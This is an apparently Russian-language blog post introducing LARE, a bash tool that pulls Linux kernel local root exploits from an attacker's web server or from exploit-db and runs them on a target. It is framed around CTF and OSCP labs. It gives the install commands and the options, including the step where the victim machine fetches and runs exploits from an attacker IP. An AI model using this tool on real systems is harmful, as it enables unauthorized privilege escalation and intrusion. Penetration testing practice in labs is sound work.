LARE - эксплойтер для атак на Linux-системы

[L] ocal [A] uto [R] oot [E] xploiter - это простой сценарий bash, который помогает развернуть локальные корневые эксплойты с вашего атакующего компьютера, когда ваш компьютер-жертва не имеет подключения к Интернету.
Сценарий полезен в сценарии, когда ваш компьютер-жертва не имеет подключения к Интернету (например,), когда вы находитесь во внутренниих сетях или играете CTF, который использует VPN для подключения к закрытым лабораториям (например, hackthebox.gr или даже в OSCP лаборатории.) В сценарии используются локальные корневые эксплоиты для ядра Linux 2.6-4.8

 

Установка и запуск

git clone https://github.com/EnigmaDimitri/LARE

cd LARE

./LARA.sh -h

Опции программы:

-a  or --arsenal: Загружает эксплоиты в каталог / var / www / html и запускает сервер Apache.

-l <Attacker-IP>  or --Lroot <Attacker-IP>: Получение эксплойтов от атакующих и запуск эксплойтера .

-r  or --Rroot: Загружает эксплоиты непосредственно на сервер и запускает эксплойтер.

1- Атака на жертву в закрытой сети

Вы должны сначала установить арсенал эксплойта на атакующую машину и запустить экземпляр apache2, используя следующую команду bash LARE.sh -a or ./LARE.sh -a

Утилита сервер создала, вот только я лопухнулась, не создала папку, куда утилита автоматом будет загружать эксплоиты.

Ошибку исправила

Эксплоиты погнали весело загружаться.)))

После этого вы должны скопировать сценарий на компьютер-жертву любыми способами (wget, ftp, curl и т. Д.). И запустить Exploiter локально с помощью следующей команды: bash LARE.sh -l [Attackers-IP] или ./LARE.sh -l [Attackers-IP]

Данную картинку уперла у автора данной тулзы. И далее, инструкция с его же страницы, потому как у меня не выбрана жертва для атаки.

2- Атака на жертву с помощью Интернета
В этом сценарии, скрипт должен запускаться на машине жертв, и он получит эксплойты из репозитория github эксплойта-db и будет использовать его для непосредственного использования. Это оригинальная функция Auto Root Exploit Tool с некоторой тонкой настройкой. Запустите Exploiter с помощью следующей команды: bash LARE.sh -l или ./LARE.sh -l

На заметку

Сценарий запускает несколько эксплойтов ядра на машине, что может привести к нестабильности системы, поэтому настоятельно рекомендуется использовать его в качестве последнего средства и в непроизводственной среде.